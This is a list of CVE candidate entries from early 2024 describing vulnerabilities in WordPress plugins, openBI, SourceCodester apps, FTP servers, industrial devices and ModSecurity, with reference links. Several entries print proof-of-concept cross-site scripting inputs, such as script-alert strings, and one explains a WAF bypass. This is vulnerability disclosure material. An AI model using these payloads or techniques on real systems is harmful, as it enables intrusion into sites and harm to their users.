CVE 2024 1049 Candidate The Page Builder Gutenberg Blocks – CoBlocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Icon Widget's in all versions up to, and including, 3.1.6 due to insufficient input sanitization and output escaping on the link value. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3049222%40vimeography&new=3049222%40vimeography&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/56d1d152-946f-47c9-b0d5-76513370677f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/56d1d152-946f-47c9-b0d5-76513370677f?source=cve Assigned (20240129)
CVE 2024 1048 Candidate A flaw was found in the grub2-set-bootflag utility of grub2. After the fix of CVE-2019-14865, grub2-set-bootflag will create a temporary file with the new grubenv content and rename it to the original grubenv file. If the program is killed before the rename operation, the temporary file will not be removed and may fill the filesystem when invoked multiple times, resulting in a filesystem out of free inodes or blocks. CONFIRM:https://security.netapp.com/advisory/ntap-20240223-0007/ | FEDORA:FEDORA-2024-097eb22907 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XRZQCVZ3XOASVFT6XLO7F2ZXOLOHIJZQ/ | FEDORA:FEDORA-2024-c1fabee30e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YSJAEGRR3XHMBBBKYOVMII4P34IXEYPE/ | MISC:RHBZ#2256827 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2256827 | MISC:http://www.openwall.com/lists/oss-security/2024/02/06/3 | URL:http://www.openwall.com/lists/oss-security/2024/02/06/3 | MISC:https://access.redhat.com/security/cve/CVE-2024-1048 | URL:https://access.redhat.com/security/cve/CVE-2024-1048 | MISC:https://www.openwall.com/lists/oss-security/2024/02/06/3 | URL:https://www.openwall.com/lists/oss-security/2024/02/06/3 Assigned (20240129)
CVE 2024 1047 Candidate The Orbit Fox by ThemeIsle plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the register_reference() function in all versions up to, and including, 2.10.28. This makes it possible for unauthenticated attackers to update the connected API keys. MISC:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php#L175 | URL:https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php#L175 | MISC:https://plugins.trac.wordpress.org/changeset/3029507/themeisle-companion/tags/2.10.29/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php | URL:https://plugins.trac.wordpress.org/changeset/3029507/themeisle-companion/tags/2.10.29/vendor/codeinwp/themeisle-sdk/src/Modules/Promotions.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6147582f-578a-47ad-b16c-65c37896783d?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6147582f-578a-47ad-b16c-65c37896783d?source=cve Assigned (20240129)
CVE 2024 1046 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin 'reg-number-field' shortcode in all versions up to, and including, 4.14.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3030229/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php | URL:https://plugins.trac.wordpress.org/changeset/3030229/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7911c774-3fb0-4d6c-a847-101e5ad8637a?source=cve Assigned (20240129)
CVE 2024 1044 Candidate The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'submit_review' function in all versions up to, and including, 5.38.12. This makes it possible for unauthenticated attackers to submit reviews with arbitrary email addresses regardless of whether reviews are globally enabled. MISC:https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?old_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.38.12&old=3032310&new_path=%2Fcustomer-reviews-woocommerce%2Ftags%2F5.39.0&new=3032310&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4420c334-1ea4-4549-b391-150702abc2f8?source=cve Assigned (20240129)
CVE 2024 1043 Candidate The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'amppb_remove_saved_layout_data' function in all versions up to, and including, 1.0.93.1. This makes it possible for authenticated attackers, with contributor access and above, to delete arbitrary posts on the site. MISC:https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134 | URL:https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93.1/pagebuilder/inc/adminAjaxContents.php#L134 | MISC:https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php | URL:https://plugins.trac.wordpress.org/changeset/3030425/accelerated-mobile-pages/tags/1.0.93.2/pagebuilder/inc/adminAjaxContents.php?old=3025105&old_path=accelerated-mobile-pages%2Ftags%2F1.0.93.1%2Fpagebuilder%2Finc%2FadminAjaxContents.php | MISC:https://wordpress.org/plugins/accelerated-mobile-pages/ | URL:https://wordpress.org/plugins/accelerated-mobile-pages/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ffb70e82-355b-48f3-92d0-19659ed2550e?source=cve Assigned (20240129)
CVE 2024 1040 Candidate Gessler GmbH WEB-MASTER user account is stored using a weak hashing algorithm. The attacker can restore the passwords by breaking the hashes stored on the device. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01 Assigned (20240129)
CVE 2024 1039 Candidate Gessler GmbH WEB-MASTER has a restoration account that uses weak hard coded credentials and if exploited could allow an attacker control over the web management of the device. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-032-01 Assigned (20240129)
CVE 2024 1038 Candidate The Beaver Builder – WordPress Page Builder plugin for WordPress is vulnerable to DOM-Based Reflected Cross-Site Scripting via a 'playground.wordpress.net' parameter in all versions up to, and including, 2.7.4.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578 | URL:https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js#L1578 | MISC:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js | URL:https://plugins.trac.wordpress.org/changeset/3032809/beaver-builder-lite-version/tags/2.7.4.3/js/fl-builder.js?old=3012561&old_path=beaver-builder-lite-version/tags/2.7.4.2/js/fl-builder.js | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e2cc2776-9496-42b5-a242-c572ae5462fb?source=cve Assigned (20240129)
CVE 2024 1037 Candidate The All-In-One Security (AIOS) – Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32 | URL:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32 | MISC:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50 | URL:https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50 | MISC:https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php | URL:https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve Assigned (20240129)
CVE 2024 1036 Candidate A vulnerability was found in openBI up to 1.0.8 and classified as critical. This issue affects the function uploadIcon of the file /application/index/controller/Screen.php of the component Icon Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252311. MISC:https://note.zhaoj.in/share/X1ASzPP5rHel | URL:https://note.zhaoj.in/share/X1ASzPP5rHel | MISC:https://vuldb.com/?ctiid.252311 | URL:https://vuldb.com/?ctiid.252311 | MISC:https://vuldb.com/?id.252311 | URL:https://vuldb.com/?id.252311 Assigned (20240129)
CVE 2024 1035 Candidate A vulnerability has been found in openBI up to 1.0.8 and classified as critical. This vulnerability affects the function uploadIcon of the file /application/index/controller/Icon.php. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252310 is the identifier assigned to this vulnerability. MISC:https://note.zhaoj.in/share/AIbnbytIW9Bq | URL:https://note.zhaoj.in/share/AIbnbytIW9Bq | MISC:https://vuldb.com/?ctiid.252310 | URL:https://vuldb.com/?ctiid.252310 | MISC:https://vuldb.com/?id.252310 | URL:https://vuldb.com/?id.252310 Assigned (20240129)
CVE 2024 1034 Candidate A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadFile of the file /application/index/controller/File.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252309 was assigned to this vulnerability. MISC:https://note.zhaoj.in/share/ABYkFE4wRPW5 | URL:https://note.zhaoj.in/share/ABYkFE4wRPW5 | MISC:https://vuldb.com/?ctiid.252309 | URL:https://vuldb.com/?ctiid.252309 | MISC:https://vuldb.com/?id.252309 | URL:https://vuldb.com/?id.252309 Assigned (20240129)
CVE 2024 1033 Candidate A vulnerability, which was classified as problematic, has been found in openBI up to 1.0.8. Affected by this issue is the function agent of the file /application/index/controller/Datament.php. The manipulation of the argument api leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252308. MISC:https://note.zhaoj.in/share/nD654ot6zRQZ | URL:https://note.zhaoj.in/share/nD654ot6zRQZ | MISC:https://vuldb.com/?ctiid.252308 | URL:https://vuldb.com/?ctiid.252308 | MISC:https://vuldb.com/?id.252308 | URL:https://vuldb.com/?id.252308 Assigned (20240129)
CVE 2024 1032 Candidate A vulnerability classified as critical was found in openBI up to 1.0.8. Affected by this vulnerability is the function testConnection of the file /application/index/controller/Databasesource.php of the component Test Connection Handler. The manipulation leads to deserialization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252307. MISC:https://note.zhaoj.in/share/6ISYe2urjlkI | URL:https://note.zhaoj.in/share/6ISYe2urjlkI | MISC:https://vuldb.com/?ctiid.252307 | URL:https://vuldb.com/?ctiid.252307 | MISC:https://vuldb.com/?id.252307 | URL:https://vuldb.com/?id.252307 Assigned (20240129)
CVE 2024 1031 Candidate A vulnerability was found in CodeAstro Expense Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file templates/5-Add-Expenses.php of the component Add Expenses Page. The manipulation of the argument item leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252304. MISC:https://docs.qq.com/doc/DYmhqV3piekZ5dlZi | URL:https://docs.qq.com/doc/DYmhqV3piekZ5dlZi | MISC:https://vuldb.com/?ctiid.252304 | URL:https://vuldb.com/?ctiid.252304 | MISC:https://vuldb.com/?id.252304 | URL:https://vuldb.com/?id.252304 Assigned (20240129)
CVE 2024 1030 Candidate A vulnerability was found in Cogites eReserv 7.7.58. It has been classified as problematic. This affects an unknown part of the file /front/admin/tenancyDetail.php. The manipulation of the argument id leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252303. MISC:https://vuldb.com/?ctiid.252303 | URL:https://vuldb.com/?ctiid.252303 | MISC:https://vuldb.com/?id.252303 | URL:https://vuldb.com/?id.252303 Assigned (20240129)
CVE 2024 1029 Candidate A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. Affected by this issue is some unknown functionality of the file /front/admin/tenancyDetail.php. The manipulation of the argument Nom with the input Dreux"><script>alert('XSS')</script> leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252302 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252302 | URL:https://vuldb.com/?ctiid.252302 | MISC:https://vuldb.com/?id.252302 | URL:https://vuldb.com/?id.252302 Assigned (20240129)
CVE 2024 1028 Candidate A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Post Handler. The manipulation of the argument Description with the input <marquee>HACKED</marquee> leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252301 was assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252301 | URL:https://vuldb.com/?ctiid.252301 | MISC:https://vuldb.com/?id.252301 | URL:https://vuldb.com/?id.252301 Assigned (20240129)
CVE 2024 1027 Candidate A vulnerability, which was classified as critical, was found in SourceCodester Facebook News Feed Like 1.0. Affected is an unknown function of the component Post Handler. The manipulation leads to unrestricted upload. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-252300. MISC:https://vuldb.com/?ctiid.252300 | URL:https://vuldb.com/?ctiid.252300 | MISC:https://vuldb.com/?id.252300 | URL:https://vuldb.com/?id.252300 Assigned (20240129)
CVE 2024 1026 Candidate A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252293 | URL:https://vuldb.com/?ctiid.252293 | MISC:https://vuldb.com/?id.252293 | URL:https://vuldb.com/?id.252293 Assigned (20240129)
CVE 2024 1024 Candidate A vulnerability has been found in SourceCodester Facebook News Feed Like 1.0 and classified as problematic. This vulnerability affects unknown code of the component New Account Handler. The manipulation of the argument First Name/Last Name with the input <script>alert(1)</script> leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252292. MISC:https://vuldb.com/?ctiid.252292 | URL:https://vuldb.com/?ctiid.252292 | MISC:https://vuldb.com/?id.252292 | URL:https://vuldb.com/?id.252292 Assigned (20240129)
CVE 2024 1022 Candidate A vulnerability, which was classified as problematic, was found in CodeAstro Simple Student Result Management System 5.6. This affects an unknown part of the file /add_classes.php of the component Add Class Page. The manipulation of the argument Class Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252291. MISC:https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing | URL:https://drive.google.com/file/d/1lPZ1yL9UlU-uB03xz17q4OR9338X_1am/view?usp=sharing | MISC:https://vuldb.com/?ctiid.252291 | URL:https://vuldb.com/?ctiid.252291 | MISC:https://vuldb.com/?id.252291 | URL:https://vuldb.com/?id.252291 Assigned (20240129)
CVE 2024 1021 Candidate A vulnerability, which was classified as critical, has been found in Rebuild up to 3.5.5. Affected by this issue is the function readRawText of the component HTTP Request Handler. The manipulation of the argument url leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252290 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252290 | URL:https://vuldb.com/?ctiid.252290 | MISC:https://vuldb.com/?id.252290 | URL:https://vuldb.com/?id.252290 | MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5 | URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/yemvnt5uo53gfem5 Assigned (20240129)
CVE 2024 1020 Candidate A vulnerability classified as problematic was found in Rebuild up to 3.5.5. Affected by this vulnerability is the function getStorageFile of the file /filex/proxy-download. The manipulation of the argument url leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252289 was assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252289 | URL:https://vuldb.com/?ctiid.252289 | MISC:https://vuldb.com/?id.252289 | URL:https://vuldb.com/?id.252289 | MISC:https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab | URL:https://www.yuque.com/mailemonyeyongjuan/tha8tr/gdd3hiwz8uo6ylab Assigned (20240129)
CVE 2024 1019 Candidate ModSecurity / libModSecurity 3.0.0 to 3.0.11 is affected by a WAF bypass for path-based payloads submitted via specially crafted request URLs. ModSecurity v3 decodes percent-encoded characters present in request URLs before it separates the URL path component from the optional query string component. This results in an impedance mismatch versus RFC compliant back-end applications. The vulnerability hides an attack payload in the path component of the URL from WAF rules inspecting it. A back-end may be vulnerable if it uses the path component of request URLs to construct queries. Integrators and users are advised to upgrade to 3.0.12. The ModSecurity v2 release line is not affected by this vulnerability. FEDORA:FEDORA-2024-4645d0fdef | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/34KDQNZE2RS3CWFG5654LNHKXXDPIW5I/ | FEDORA:FEDORA-2024-698e541c52 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K6ZGABPJK2JPVH2JDFHZ5LQLWGONUH7V/ | MISC:https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30 | URL:https://owasp.org/www-project-modsecurity/tab_cves#cve-2024-1019-2024-01-30 Assigned (20240129)
CVE 2024 1018 Candidate A vulnerability classified as problematic has been found in PbootCMS 3.2.5-20230421. Affected is an unknown function of the file /admin.php?p=/Area/index#tab=t2. The manipulation of the argument name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252288. MISC:https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md | URL:https://github.com/1MurasaKi/PboostCMS_XSS/blob/main/README.md | MISC:https://vuldb.com/?ctiid.252288 | URL:https://vuldb.com/?ctiid.252288 | MISC:https://vuldb.com/?id.252288 | URL:https://vuldb.com/?id.252288 Assigned (20240129)
CVE 2024 1017 Candidate A vulnerability was found in Gabriels FTP Server 1.2. It has been rated as problematic. This issue affects some unknown processing. The manipulation of the argument USERNAME leads to denial of service. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-252287. MISC:https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.252287 | URL:https://vuldb.com/?ctiid.252287 | MISC:https://vuldb.com/?id.252287 | URL:https://vuldb.com/?id.252287 | MISC:https://www.youtube.com/watch?v=wwHuXfYS8yQ | URL:https://www.youtube.com/watch?v=wwHuXfYS8yQ Assigned (20240129)
CVE 2024 1016 Candidate A vulnerability was found in Solar FTP Server 2.1.1/2.1.2. It has been declared as problematic. This vulnerability affects unknown code of the component PASV Command Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252286 is the identifier assigned to this vulnerability. MISC:https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html | URL:https://packetstormsecurity.com/files/176675/Solar-FTP-Server-2.1.2-Denial-Of-Service.html | MISC:https://vuldb.com/?ctiid.252286 | URL:https://vuldb.com/?ctiid.252286 | MISC:https://vuldb.com/?id.252286 | URL:https://vuldb.com/?id.252286 Assigned (20240129)
CVE 2024 1015 Candidate Remote command execution vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could send different commands from the operating system to the system via the web configuration functionality of the device. MISC:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html | URL:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html | MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products Assigned (20240129)
CVE 2024 1014 Candidate Uncontrolled resource consumption vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could interrupt the availability of the administration panel by sending multiple ICMP packets. MISC:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html | URL:https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html | MISC:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products | URL:https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products Assigned (20240129)
CVE 2024 1013 Candidate An out-of-bounds stack write flaw was found in unixODBC on 64-bit architectures where the caller has 4 bytes and callee writes 8 bytes. This issue may go unnoticed on little-endian architectures, while big-endian architectures can be broken. MISC:RHBZ#2260823 | URL:https://bugzilla.redhat.com/show_bug.cgi?id=2260823 | MISC:https://access.redhat.com/security/cve/CVE-2024-1013 | URL:https://access.redhat.com/security/cve/CVE-2024-1013 | MISC:https://github.com/lurcher/unixODBC/pull/157 | URL:https://github.com/lurcher/unixODBC/pull/157 Assigned (20240129)
CVE 2024 1012 Candidate A vulnerability, which was classified as critical, has been found in Wanhu ezOFFICE 11.1.0. This issue affects some unknown processing of the file defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp. The manipulation of the argument recordId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252281 was assigned to this vulnerability. MISC:https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md | URL:https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md | MISC:https://vuldb.com/?ctiid.252281 | URL:https://vuldb.com/?ctiid.252281 | MISC:https://vuldb.com/?id.252281 | URL:https://vuldb.com/?id.252281 Assigned (20240129)
CVE 2024 1011 Candidate A vulnerability classified as problematic was found in SourceCodester Employee Management System 1.0. This vulnerability affects unknown code of the file delete-leave.php of the component Leave Handler. The manipulation of the argument id leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252280. MISC:https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control | URL:https://github.com/jomskiller/Employee-Managemet-System---Broken-Access-Control | MISC:https://vuldb.com/?ctiid.252280 | URL:https://vuldb.com/?ctiid.252280 | MISC:https://vuldb.com/?id.252280 | URL:https://vuldb.com/?id.252280 Assigned (20240129)
CVE 2024 1010 Candidate A vulnerability classified as problematic has been found in SourceCodester Employee Management System 1.0. This affects an unknown part of the file edit-profile.php. The manipulation of the argument fullname/phone/date of birth/address/date of appointment leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-252279. MISC:https://github.com/jomskiller/Employee-Management-System---Stored-XSS | URL:https://github.com/jomskiller/Employee-Management-System---Stored-XSS | MISC:https://github.com/jomskiller/Employee-Management-System---Stored-XSS/ | URL:https://github.com/jomskiller/Employee-Management-System---Stored-XSS/ | MISC:https://vuldb.com/?ctiid.252279 | URL:https://vuldb.com/?ctiid.252279 | MISC:https://vuldb.com/?id.252279 | URL:https://vuldb.com/?id.252279 Assigned (20240129)
CVE 2024 1009 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252278 | URL:https://vuldb.com/?ctiid.252278 | MISC:https://vuldb.com/?id.252278 | URL:https://vuldb.com/?id.252278 | MISC:https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn | URL:https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn Assigned (20240129)
CVE 2024 1008 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Profile Page. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252277 was assigned to this vulnerability. MISC:https://vuldb.com/?ctiid.252277 | URL:https://vuldb.com/?ctiid.252277 | MISC:https://vuldb.com/?id.252277 | URL:https://vuldb.com/?id.252277 | MISC:https://www.youtube.com/watch?v=z4gcLZCOcnc | URL:https://www.youtube.com/watch?v=z4gcLZCOcnc Assigned (20240129)
CVE 2024 1007 Candidate A vulnerability was found in SourceCodester Employee Management System 1.0. It has been classified as critical. Affected is an unknown function of the file edit_profile.php. The manipulation of the argument txtfullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252276. MISC:https://vuldb.com/?ctiid.252276 | URL:https://vuldb.com/?ctiid.252276 | MISC:https://vuldb.com/?id.252276 | URL:https://vuldb.com/?id.252276 | MISC:https://www.youtube.com/watch?v=1yesMwvWcL4 | URL:https://www.youtube.com/watch?v=1yesMwvWcL4 Assigned (20240129)
CVE 2024 1006 Candidate A vulnerability was found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This issue affects some unknown processing of the file application/index/common.php of the component Cookie Handler. The manipulation of the argument Nod_User_Id/Nod_User_Token leads to improper authentication. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252275. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/vWuVlU2eg79t | URL:https://note.zhaoj.in/share/vWuVlU2eg79t | MISC:https://vuldb.com/?ctiid.252275 | URL:https://vuldb.com/?ctiid.252275 | MISC:https://vuldb.com/?id.252275 | URL:https://vuldb.com/?id.252275 Assigned (20240129)
CVE 2024 1005 Candidate A vulnerability has been found in Shanxi Diankeyun Technology NODERP up to 6.0.2 and classified as critical. This vulnerability affects unknown code of the file /runtime/log. The manipulation leads to files or directories accessible. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252274 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:https://note.zhaoj.in/share/M9ERphWTXUPj | URL:https://note.zhaoj.in/share/M9ERphWTXUPj | MISC:https://vuldb.com/?ctiid.252274 | URL:https://vuldb.com/?ctiid.252274 | MISC:https://vuldb.com/?id.252274 | URL:https://vuldb.com/?id.252274 Assigned (20240129)
